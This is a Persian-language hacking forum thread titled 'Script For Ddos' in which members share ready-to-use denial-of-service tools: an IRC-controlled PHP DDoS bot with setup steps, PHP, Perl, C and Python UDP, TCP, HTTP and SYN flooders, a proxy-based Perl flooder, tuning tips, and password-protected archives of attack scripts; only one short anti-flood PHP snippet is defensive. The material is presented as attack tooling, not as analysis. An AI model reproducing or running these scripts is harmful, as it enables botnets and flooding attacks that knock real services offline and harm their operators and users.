عضويت در تيم امنيتي فاتح گر رايگان ميباشد
ورود به حساب ثبت نام جدید فراموشی کلمه عبور
برای ورود به حساب کاربری خود، نام کاربری و کلمه عبورتان را در زیر وارد کرده و روی «ورود به سایت» کلیک کنید.





اگر فرم ورود برای شما نمایش داده نمیشود، اینجا را کلیک کنید.









اگر فرم ثبت نام برای شما نمایش داده نمی‌شود، اینجا را کلیک کنید.









اگر فرم بازیابی کلمه عبور برای شما نمایش داده نمی‌شود، اینجا را کلیک کنید.





نمایش نتایج: از 1 به 6 از 6

موضوع: Script For Ddos

  1. #1
    تاریخ عضویت
    2015/07/20
    محل سکونت
    bin/krj/!#
    نوشته ها
    200
    184
    کاربر عضو
    کـاربـر عـضـو

    Script For Ddos

    درود در این تاپیک اکسپلویت های Ddosنوشته شده قرار داده میشود با تشکر
    اکسپلویت های به زبان
    php , perl ,python ,ruby و ...
    موفق باشید تشکر فراموش نشه
    قرار دادن اسکیریپت مجاز :|


    طرز استفاده :
    کد:
    - Open mIRC (download: mirc.com)
    - Upload php_ddos_bot.php to your web server
    - Go to
    
    yourdomain.com/path/to/php_ddos_bot.php
    
    - Bot will join #yourchannel
    - PM the bot saying "ddos-udp IPHERE"
    موفق باشید


    امروز بار دیگر با یه PHP DDoser خصوصی (Priv8) اومدم که کارایی اون بهتر از دیگر DDos هاس که کارایی آن بدین صورت است که تمام کاربرانی که مشاهده صفحه این اسکریپت پی اچ پی هستند شد به آپاراسی - سرور متصل می شوند. در این صورتی که داخل سرور هستید ، شما با دادن دستورات پاکت های udp and tcp به آنها گوش بدید
    این هم اسکریپت

    کد HTML:
    <?php
    /*
    
      Simple PHP DDOSER
      (C) 2010-2011(Private)
      Www.Ashiyane.org
    --------------------------
     Researcher By MobtakerZ
    
    */
    
    //EDIT HERE!!!
    $server="your_irc_Server";
    $Port="6667";
    $nick="slave-";$willekeurig;
    $willekeurig=mt_rand(0,3);
    $nicknummer=mt_rand(100000,999999);
    $Channel="#yourchannel";
    $Channelpass="yourpwd";
    $msg="Farewell.";
    //STOP EDITING!
    
    set_time_limit(0);
    $loop = 0; $verbonden = 0;
    $verbinden = fsockopen($server, $Port);
    
    while ($read = fgets($verbinden,512)) {
    
       $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
       $read2 = explode(" ",$read);
    
       if ($loop == 0) {
         fputs($verbinden,"nick $nick$nicknummer\n\n");
         fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
       }
    
       if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }
    
       if ($read2[1] == 251) {
         fputs($verbinden,"join $Channel $Channelpass\n");
         $verbonden++;
       }
    
    //READING AREA
       if (eregi("bot-op",$read)) {
        fputs($verbinden,"mode $Channel +o $read2[4]\n");
       }
    
    
       if (eregi("bot-deop",$read)) {
        fputs($verbinden,"mode $Channel -o $read2[4]\n");
       }
    
       if (eregi("bot-quit",$read)) {
        fputs($verbinden,"quit :$msg\n\n");
        break;
       }
    
       if (eregi("bot-join",$read)) {
        fputs($verbinden,"join $read2[4]\n");
       }
    
       if (eregi("bot-part",$read)) {
        fputs($verbinden,"part $read2[4]\n");
       }
    
    
       if (eregi("ddos-udp",$read)) {
        fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
     $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
     if (!$fp)
     {
     //echo "$errstr ($errno)<br>\n"; //troep
     exit;
     }
     else
     {
     $char = "a";
     for($a = 0; $a < 9999999999999; $a++)
      $data = $data.$char;
    
     if(fputs ($fp, $data) )
      fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
     else
      fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
     }
       }
    
       if (eregi("ddos-tcp",$read)) {
        fputs($verbinden,"part $read2[4]\n");
     fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
     $server = $read2[4];
     $Port = $read2[5];
    
     for($sockets = 0; $sockets < $read2[6]; $sockets++)
     {
     $verbinden = fsockopen($server, $Port);
     }
       }
    
       if (eregi("ddos-http",$read)) {
        fputs($verbinden,"part $read2[4]\n");
     fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
     $Webserver = $read2[4];
     $Port = $read2[5];
    
     $Aanvraag = "GET / HTTP/1.1\r\n";
     $Aanvraag .= "Accept: */*\r\n";
     $Aanvraag .= "Accept-Language: nl\r\n";
     $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
     $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
     $Aanvraag .= "Host: $read2[4]\r\n";
     $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
    
     for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
     {
     $DoS = fsockopen($Webserver, $Port);
     fwrite($DoS, $Aanvraag);
     fclose($DoS);
     }
       }
       $loop++;
    
    }
    ?>
    موفق باشید



    ضد دیداس

    کد HTML:
    <?PHP
     
    IF (!ISSET($_SESSION)) {
        SESSION_START();
    }
    // anti flood protection
    IF($_SESSION['last_session_request'] > TIME() - 2){
        // users will be redirected to this page if it makes requests faster than 2 seconds
        HEADER("location: /flood.html");
        EXIT;
    }
    $_SESSION['last_session_request'] = TIME();
     
    ?>
    موفق باشید

    دلیل: ادغام دو پست برای جلوگیری از اسپم

    exp php curl Dos
    این اختصاصی کار خودمه تشکر خداییی فراموشت نشه
    کد HTML:
    <?php
         //Consol Based CURL Dos
        //   By: Viera 
       //              fatehgar.org/cc
      //use ?x=9000&target=google.com
     // Target = Target
    // x = Connections
    ///////////////////////////////////
    
    function MakeArrays($count, $url)
    {
      echo "[+] Preparing Arrays\n";
      $victim = array();
       for($x = 0; $x <= $count; $x++)
       {
         $victim[$x] = $url; 
       }
       echo "[+] DONE Preparing Arrays ({$count})\n";
       return $victim;
    }
    
    if(!isset($_REQUEST['target']) || empty($_REQUEST['target']))
     die("[-] ***** go back and put in valid params.\n");
    
    $victim = MakeArrays(trim($_REQUEST['x']), trim($_REQUEST['target']));
    
    echo "[+] Preparing cURL
    ";
    $mh = curl_multi_init();
    
    foreach ($victim as $i => $url)
    {
           $c[$i] = curl_init($url);
           curl_setopt($c[$i], CURLOPT_RETURNTRANSFER, 1);
           curl_multi_add_handle($mh, $c[$i]);
    }
    echo "[+] DONE Preparing cURL 
    ";
    echo "[+] Starting cURL Attacks 
    ";
    do 
    {
      $n = curl_multi_exec($mh, $active); 
    } while ($active);
    echo "[+] Attacks Completed 
    ";
    echo "[+] Waiting for Server buffer. 
    ";
    foreach ($victim as $i => $url)
    {
           $res[$i]=curl_multi_getcontent($c[$i]);
           curl_close($c[$i]);
    }
    echo "[+] DoS done?\n";
    
    ?>
    موفق باشید


    Flood IP using perl
    پرل
    مورد نیاز : پرل اکتیویشن
    کد HTML:
    #!/usr/bin/perl
    # udp
    #flooder.pl coded by disturbed_1
    
    print q{
    =================================================
    = =
    = Coded By =
    = =
    = Disturbed_1 =
    = =
    = jAGUARTEAM =
    = =
    = =
    = =
    =================================================
    };
    
    use io::socket;
    
    print "Host: ";
    chop ($host = <stdin>);
    print "Port: ";
    chop ($port = <stdin>);
    
    {
    $sock = IO::Socket::INET->new (
    PeerAddr => $host,
    PeerPort => $port,
    Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
    }
    packets:
    while (1) {
    $size = rand() * 200 * 2000;
    print ("$host:$port packet size: $size\n");
    send($sock, 0, $size);
    }
    موفق باشید


    اینم یکی دیگه از UDP Flood
    کد HTML:
    <?php
    
    if(isset($_GET['host'])&&is_numeric($_GET['time'])){
        $pakits = 0;
        ignore_user_abort(TRUE);
        set_time_limit(0);
        
        $exec_time = $_GET['time'];
        
        $time = time();
    
        $max_time = $time+$exec_time;
    
        $host = $_GET['host'];
        
        for($i=0;$i<65000;$i++){
                $out .= 'X';
        }
        while(1){
        $pakits++;
                if(time() > $max_time){
                        break;
                }
                $rand = rand(1,65000);
                $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
                if($fp){
                        fwrite($fp, $out);
                        fclose($fp);
                }
        }
        echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n";
        echo '<br><br>
            <form action="'.$surl.'" method=GET>
            <input type="hidden" name="x" value="phptools">
            Host: <input type=text name=host value=localhost>
            Length (seconds): <input type=text name=time value=9999>
            <input type=submit value=Go></form>';
    }else{ echo '<br><b>UDP Flood</b><br>
                <form action=? method=GET>
                <input type="hidden" name="x" value="phptools">
                Host: <br><input type=text name=host value=localhost><br>
                Length (seconds): <br><input type=text name=time value=9999><br>
                <input type=submit value=Go></form>';
    }
    موفق باشید

    udp flooder به زبان php
    کد HTML:
    /* cw.c 
     * a udp flooder that doesnt need root, based off udp-bitchslap.c 
     * cw.c By NTFX 
     * Legion2000 Security Research 1996 - 2002 
     * Contact: NTX@SpyModem.Com 
     * 
     * "Multithreaded cw" 
     * gcc -o cw cw.c -lpthread 
     * lgcc -o cw cw.c -lpthread 
     */ 
    
    #include <errno.h> 
    #include <netdb.h> 
    #include <pthread.h> 
    #include <stdio.h> 
    #include <unistd.h> 
    #include <arpa/inet.h> 
    #include <netinet/in.h> 
    #include <netinet/in_systm.h> 
    #include <sys/socket.h> 
    #include <sys/time.h> 
    #include <sys/types.h> 
    
    void usage (char *program); 
    void *scanport (void *arg); 
    char *elapsed (struct timeval first, struct timeval second); 
    
    struct sockaddr_in s_in; 
    FILE *out; 
    pthread_mutex_t varlock = PTHREAD_MUTEX_INITIALIZER; 
    pthread_t threadid; 
    int numthreads = 0, done = 0, ready = 0; 
    u_short lower, upper; 
    
    #define MAXTHREADS 256   /* The maximum number of concurrent threads available */ 
    #define TIMEOUT 0  
    #define NUMRETRIES 100    /* Number of times to retry when no error or datagram 
                               is received in reply */ 
    
    
    void 
    usage (char *program) 
    { 
      fprintf (stderr, 
               "Invalid usage; please try: ./cw <desthost>\n"); 
      exit (-1); 
    } 
    
    
    /* Our scanning method really kinda sucks, but its the best we can do, 
     * due to various limitations in the protocol itself. If a host or 
     * its routers return no data for a particular port, the best we can 
     * do is assume that the port is open. If neither a UDP datagram nor 
     * an ICMP error message is returned, we must declare the port open. 
     * This is because some UDP ports dont respond to malformed packets. 
     * If we receive a UDP datagram back, obviously the port is listening. 
     * Last but not least, if the port is in fact closed, and the host is 
     * responsive, the recv() will fail, yielding an errno of ECONNRESET, 
     * corresponding to an ICMP port unreachable message. As we see, some 
     * UDP services such as daytime will send a packet upon receipt of ANY 
     * datagram, but other services such as BIND will only respond to a 
     * legitimate DNS packet, thus effectively always timing out. 
     * As we all know, UDP is an unreliable protocol, so two probes will 
     * be sent to a port that times out, just to ensure that the packet 
     * was not dropped, misrouted, or lost in transit.  
     * NOTE: If you scan your localhost there might be a misleading 
     * collision caused by a packet that is sent to one of the very same 
     * UDP sockets that you are scanning from :) */ 
    
    void * 
    scanport (void *arg) 
    { 
      struct sockaddr_in mys_in = s_in; 
      struct servent *se; 
      struct timeval tv; 
      fd_set readfd; 
      u_short port; 
      char data[1], *alphaport; 
      int error, udpsocket, counter, open; 
    
      pthread_mutex_lock (&varlock); 
      numthreads++; 
      pthread_mutex_unlock (&varlock); 
    
      if ((udpsocket = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) 
        return; 
    
      pthread_detach (pthread_self ()); 
      port = (u_short) arg; 
      mys_in.sin_port = htons (port); 
    
      if (connect (udpsocket, (struct sockaddr *) &mys_in, sizeof ( 
                   struct sockaddr_in)) == 0) 
        { 
    
    
          for (counter = 0; counter < NUMRETRIES; counter++) 
            { 
              FD_ZERO (&readfd); 
              FD_SET (udpsocket, &readfd); 
              tv.tv_sec = TIMEOUT; 
              tv.tv_usec = 0; 
    
              send (udpsocket, data, 0, 0); 
              error = select ((udpsocket + 1), &readfd, NULL, NULL, &tv); 
    
              switch(error) 
                { 
                  case (-1): 
                    fprintf (stderr, "Select() failed; exiting.\n"); 
                    exit (-1); 
                    break; 
                  case 0: 
                    open = 1; 
                    break; 
                  case 1: 
                    open = (recv (udpsocket, data, 0, 0) != -1); 
                    break; 
                }    
    
              if (error != 0) 
                break; 
    
            /* If error was 0, there was no reply; we retry for  
               a variable number of times */ 
    
            } 
    
          if (open) 
            { 
    
           /* It may seem silly to print to a buffer first, but we must 
            * printf() in one fell swoop to avoid the threads accessing 
            * stdout concurrently and merging their output. */ 
    
        //      alphaport = (char *) malloc (8); 
    
       //       if (error == 0) 
       //         snprintf (alphaport, 7, "[%d]", port); 
        //      else 
          //      snprintf (alphaport, 7, "%d", port); 
              
            //  if ((se = getservbyport (htons (port), "udp")) != NULL) 
              //  fprintf (out, " %s (%s),", alphaport, se->s_name); 
             // else 
      //          fprintf (out, " %s,", alphaport); 
    
            } 
    
        } 
    
      fflush(out); 
      close (udpsocket); 
      pthread_mutex_lock (&varlock); 
      numthreads--; 
    
      if (port == upper) 
        done = 1; 
    
      if ((done) && (!(numthreads))) 
        ready = 1; 
    
      pthread_mutex_unlock (&varlock); 
    
      pthread_exit (NULL); 
      return; 
    } 
    
    
    int 
    main (int argc, char *argv[]) 
    { 
      pthread_t threadid; 
      struct timeval initial, final; 
      struct hostent *he; 
      u_short inc; 
    
      if (argc != 2) 
        usage (argv[0]); 
    
      //if ((!(lower = atoi (argv[2]))) || (!(upper = atoi (argv[3])))) 
      //  { 
       //   fprintf (stderr, "Invalid lower or upper port specified! Exiting.\n"); 
       //   exit(-1); 
       // } 
    
      if ((he = gethostbyname (argv[1])) == NULL) 
        { 
          fprintf (stderr, "Unable to resolve target host! Exiting.\n"); 
          exit (-1); 
        } 
    
      memset (&s_in, 0, sizeof (s_in)); 
      s_in.sin_family = AF_INET; 
      memcpy (&s_in.sin_addr.s_addr, he->h_addr, he->h_length); 
    
    //  if (upper < lower) 
    //    { 
          inc = 65535;//upper; 
          upper = rand(); //lower; 
          lower = rand(); //inc;             
    //    } 
    
      out = fdopen (fileno (stdout), "w"); 
      fprintf(out, "\nCock whipping host : %s with leet packets ", inet_ntoa (s_in.sin_addr)); 
      fflush (out); 
    
      gettimeofday (&initial, NULL); 
      /* We've prepped everything, now it's time to scan each host in a loop */ 
    while(1) 
      for (inc = lower - 1; inc<= upper; inc++) 
        { 
    //      while (numthreads >= MAXTHREADS) 
    //        ;       /* A null loop to wait until space is freed */   
          pthread_create (&threadid, NULL, scanport, (void *) inc); 
        } 
    
      while (!(ready)) { }  /* Another null loop to wait for all scanning to get done */ 
    
      gettimeofday (&final, NULL); 
      printf ("\nFinished scan for a total of %s seconds.\n", 
              elapsed (initial, final)); 
    } 
    
    
    char *  
    elapsed (struct timeval first, struct timeval second)  
    { 
      char *length;         /* x.yy Seconds.hundredths */ 
      double a, b, diff; 
       
      length = (char *) malloc (7); 
      a = first.tv_sec + ((double) (first.tv_usec) / 1000000); 
      b = second.tv_sec + ((double) (second.tv_usec) / 1000000); 
      diff = b - a; 
      snprintf (length, 6, "%2f", diff); 
      return (length); 
    }
    موفق باشید

    دلیل: ادغام دو پست برای جلوگیری از اسپم

    اسکیریپت حرفه ای Ddos
    کد HTML:
    #!usr/bin/perl 
    #please dont edit this without including this. 
    #HTAS project --> Xer0X 
    use IO::Socket::INET; 
    print "Welcome to the Hyper Text Assault Script, or HTAS v1.0b"; 
    while (!$ARGV[0]) { 
       &usage; #change to usage subroutine 
    } 
    $x=1; 
    $gz00=1; 
    $Host = "$ARGV[0]"; 
    $Port = 80; 
    
    print "\n Please enter...\n"; 
    print "\n Path: (NOT SITE!):"; 
    $url = <STDIN>; 
    chop($url); 
    print "First Form Name:"; 
    $f1n = <STDIN>; 
    chop($f1n); 
    print "\n First Form Value:"; 
    $f1v = <STDIN>; 
    chop($f1v); 
    print "\n amount of forms left:"; 
    $amt = <STDIN>; 
    &aform(amt); 
    print "\n"; 
    $PostGet = ''; 
    
    ###Subroutines 
    sub usage { #explanation of HTAS usage 
       print "Usage{\n"; 
       print "Modules used:\n"; 
       print "IO::Socket::INET\n"; 
       print "-"x 10 . "\n"; 
       print "htas.pl <host>\n"; 
       print "Testing connection...\n"; 
       my $sock = IO::Socket::INET->new( PeerAddr => 'google.com', #yes i know not needed 
                       PeerPort => 80, 
                       Prot => 'tcp', 
                   )|| print "\nConnection Nonfunctional or website down.\n"; 
       print "Connection to test website (Google.com:80) successful.\n"; 
       print "Connection verified.\n" . ":>"x 40 . "\n"; 
       print "Hyper Text Assault Script version 1.0\n"; 
       print "This monster created by Xer0X\n}\n"; 
       exit; 
       } 
    
    sub aform { #form creation subroutine 
       $gzo = 0; #gzo = ground zer0 
    while ($gzo != $amt) {    
       print "Form " . $gzo . " name:"; 
       $bfn=<STDIN>; 
       chop($bfn); 
            $bfn=$bfn . $gzo; 
       chop($bfn); 
       print "Form " . $gzo . " value:"; 
       $bfv = <STDIN>; 
       chop($bfv); 
       $bfv = $bfv . $gzo; 
       chop($bfv); 
       $PostGet = "$PostGet" . "&" . "$bfn" . "=" . "$bfv"; 
       $gzo++; 
       } 
       &destroy; 
    } 
    
    sub printget { 
       print "\n\n\n$PostGet"; 
    } 
    
    sub destroy { #let us begin :D 
    
    while($x) { 
    print "$gz00"; 
    $gz00++; 
       my $sock = IO::Socket::INET->new( PeerAddr => "$Host", 
                          PeerPort => 80, 
                          Proto => "tcp", 
                   ); 
    &destroy unless $sock; 
    print $sock "POST $url?$f1n=$f1v"; 
    print $sock "Host: $host\n"; 
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
    print $sock "Referer: $host\n"; 
    print $sock "Accept-Language: en-us\n"; 
    print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
    print $sock "Accept-Encoding: gzip, deflate\n"; 
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; sp-ME; rv:1.7.8) Gecko/19500101 Firefox/0.0.beta3\n"; 
    print $sock "Connection: Keep-Alive\n"; 
    print $sock "Cache-Control: no-cache\n"; 
    print $sock "Content-Length: $lrg\n\n"; 
    print $sock "$PostGet\n"; 
    close($sock); 
    } 
    }
    موفق باشید

    دلیل: ادغام دو پست برای جلوگیری از اسپم

    php udp flood
    کد HTML:
    <?php 
    
    if(isset($_GET['host'])&&is_numeric($_GET['time']))** 
       $pakits = 0; 
       ignore_user_abort(TRUE); 
       set_time_limit(0); 
        
       $exec_time = $_GET['time']; 
        
       $time = time(); 
    
       $max_time = $time+$exec_time; 
    
       $host = $_GET['host']; 
        
       for($i=0;$i<65000;$i++)** 
             $out .= 'X'; 
       } 
       while(1)** 
       $pakits++; 
             if(time() > $max_time)** 
                   break; 
             } 
             $rand = rand(1,65000); 
             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); 
             if($fp)** 
                   fwrite($fp, $out); 
                   fclose($fp); 
             } 
       } 
       echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; 
       echo '<br><br> 
          <form action="'.$surl.'" method=GET> 
          <input type="hidden" name="x" value="phptools"> 
          Host: <input type=text name=host value=localhost> 
          Length (seconds): <input type=text name=time value=9999> 
          <input type=submit value=Go></form>'; 
    }else{ echo '<br><b>UDP Flood</b><br> 
             <form action=? method=GET> 
             <input type="hidden" name="x" value="phptools"> 
             Host: <br><input type=text name=host value=localhost><br> 
             Length (seconds): <br><input type=text name=time value=9999><br> 
             <input type=submit value=Go></form>'; 
    }
    موفق باشید
  2. #2
    تاریخ عضویت
    2015/03/18
    نوشته ها
    685
    2,385
    مدیر کل سایت
    مـديـريـت کـل سـايـت

    پاسخ : Script For Ddos

    مجموعه اسکریپت های مهم و کاربردی Layer 4&7 Attack Scripts و Scanners & Filtering

    پسورد: fatehgar.org
    فایل های پیوست شده فایل های پیوست شده
  3. #3
    تاریخ عضویت
    2015/08/17
    نوشته ها
    623
    616
    کاربر عضو
    کـاربـر عـضـو

    پاسخ : Script For Ddos

    Syn flood attack script
    #! /usr/bin/env python
    # Description : SYN Flood Packet creation for iptables prevention solution
    import sys
    from scapy.all import *
    #conf.verb=0
    print "Field Values of packet sent"
    p=IP(dst=sys.argv[1],id=1111,ttl=99)/TCP(sport=RandShort(),dport=[80],seq=12345,ack=1000,window=1000,flags="S")/"HaX0r SVP"
    ls(p)
    print "Sending Packets in 0.001 second intervals for timeout of 4 sec"
    ans,unans=srloop(p,inter=0.001,retry=2,timeout=4)
    print "Summary of answered & unanswered packets"
    ans.summary()
    unans.summary()
    print "source port flags in response"
    #for s,r in ans:
    # print r.sprintf("%TCP.sport% \t %TCP.flags%")
    ans.make_table(lambda(s,r): (s.dst, s.dport, r.sprintf("%IP.id% \t %IP.ttl% \t %TCP.flags%")))


    اسکریپت مربوط به حملت SYN FLOOD
    میتونید با ویرایش خط زیردر کد های بالا سرعت ارسال پاکت افزایش بدید
    ans,unans=srloop(p,inter=0.001,retry=2,timeout=4)

    و با ویرایش خط زیر در قسمت DPORT پورت پیش فرض رو تغییر بدید
    p=IP(dst=sys.argv[1],id=1111,ttl=99)/TCP(sport=RandShort(),dport=[80],seq=12345,ack=1000,window=1000,flags="S")/"HaX0r SVP"

  4. #4
    تاریخ عضویت
    2015/08/17
    نوشته ها
    623
    616
    کاربر عضو
    کـاربـر عـضـو

    پاسخ : Script For Ddos

    (Perl Script) DDoS With Proxies

    #!/usr/bin/perl
    use IO::Socket;
    print "\n\n\n[DDoS with proxies by CyberLord 2013]\n";
    print "[GET FRESH PROXY LIST FROM: [URL]http://nntime.com/[/URL]]\n";
    print "The proxy list must be like this:\n";
    print "89.218.100.58:9090\n82.200.253.242:9090\n2.135.24 2.10:9090\n2.133.93.86:8082\n";
    print "[Bulgarian Cyber Army]\n\n\n";
    print "Target:";
    print "\nEx: [URL="http://site.com//n"]http://site.com/\n[/URL]";
    chomp(my $site=<STDIN>);
    print "Proxy List:";
    print "\nEx: proxy.txt\n";
    chomp(my $proxylist=<STDIN>);
    print "Cycles:";
    print "\nEx: 2\nIf the online proxies from the list is 360 the connections will be 720\n";
    chomp(my $num=<STDIN>);
    open(IN, "<$proxylist") || die "Cannot open proxylist file!\n";
    @proxylist = <IN>;
    close(IN);
    print "Connecting . . . .\n";
    foreach $proxy(@proxylist){
    $server = ((split(/:/, $proxy))[0]);
    $port = ((split(/:/, $proxy))[1]);
    $remote = IO::Socket::INET->new(
    Proto => 'tcp',
    PeerAddr => $server,
    PeerPort => $port,
    Timeout => 0.5,
    );
    $i2++;
    if($remote){
    $i4++;
    $connections[$i4] = $remote;
    }
    }
    while($i3 <= ($num-1)){
    $i3++;
    foreach $connect(@connections){
    if($connect){
    if($i3 == 1){
    $i++;
    }
    $i5++;
    print $connect "GET $site HTTP/1.1\n\n";
    }
    }
    }

    print $i2." proxies and ".$num." cycles with ".$i5." connections from ".$i." proxies online.";


    اینم یه اسکریپت دیداس پرل که با پروکسی کار میکنه به تقاضای دوستان

    :
    1-دقت کنید پروکسی ها انلاین باشن تا مشکلی پیش نیاد.
    2-حداقل پروکسی آنلاین باید 360 تا باشه
  5. #5
    تاریخ عضویت
    2017/08/17
    نوشته ها
    2
    7
    کاربر عضو
    کـاربـر عـضـو

    پاسخ : Script For Ddos

    In The Name Of God
    import time
    import socket
    import os
    import sys
    import string

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#

    def restart_program():
    python = sys.executable
    os.execl(python, python, * sys.argv)
    curdir = os.getcwd()

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#

    print ("DDoS mode loaded")
    print ("python script made by an0nymous_nl twitter")
    host=raw_input( "Site you want to DDoS:" )
    port=input( "Port you want to attack:" )
    message=raw_input( "Input the message you want to send:" )
    conn=input( "How many connections you want to make:" )
    ip = socket.gethostbyname( host )
    print ("[" + ip + "]")
    print ( "[Ip is locked]" )
    print ( "[Attacking " + host + "]" )
    print ("+----------------------------+")
    def dos():
    #pid = os.fork()
    ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    ddos.connect((host, 80))
    ddos.send( message )
    ddos.sendto( message, (ip, port) )
    ddos.send( message );
    except socket.error, msg:
    print("|[Connection Failed] |")
    print ( "|[DDoS Attack Engaged] |")
    ddos.close()
    for i in range(1, conn):
    dos()
    print ("+----------------------------+")
    print("The connections you requested had finished")
    if __name__ == "__main__":
    answer = raw_input("Do you want to ddos more?")
    if answer.strip() in "y Y yes Yes YES".split():
    restart_program()
    else:
    os.system(curdir+"Deqmain.py")



    لطفا دکمه تشکر فراموش نکنید
  6. #6
    تاریخ عضویت
    2015/12/07
    نوشته ها
    1,463
    6,689
    مدیر ارشد
    مـديـر ارشـد

    پاسخ : Script For Ddos

    مجموعه اسکریپت های مهم و کاربردی Attack Layer 4&7 و Scanners & Filtering

    پیوست شد
    پسورد: fatehgar.org
    فایل های پیوست شده فایل های پیوست شده

    .Success is not final Failure is not fatal, It is the Courage to Continue that counts
نمایش نتایج: از 1 به 6 از 6

موضوعات مشابه

  1. معنی اصطلاحات Sql-Injection , Xss , DDos و …
    توسط Mohajer در انجمن کتابهای الکترونیکی
    پاسخ: 0
    آخرين نوشته: 2015/11/12, 15:35
  2. script for active rdp
    توسط E1.Coders در انجمن Exploit های ویندوز و لینوکس
    پاسخ: 0
    آخرين نوشته: 2015/11/05, 20:31
  3. نحوه نصب اسکریپت DDos Deflate
    توسط Raptor-Cntoz در انجمن مدیریت و امنیت لینوکس
    پاسخ: 0
    آخرين نوشته: 2015/09/15, 14:28
  4. نصب Anti DDos در سرور لینوکسی
    توسط Raptor-Cntoz در انجمن مدیریت و امنیت لینوکس
    پاسخ: 0
    آخرين نوشته: 2015/09/15, 13:44
  5. حملات Ddos چیستند؟
    توسط PockeR در انجمن ابزارها و مقالات DoS & DDoS
    پاسخ: 0
    آخرين نوشته: 2015/03/30, 17:16

کلمات کلیدی این موضوع

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •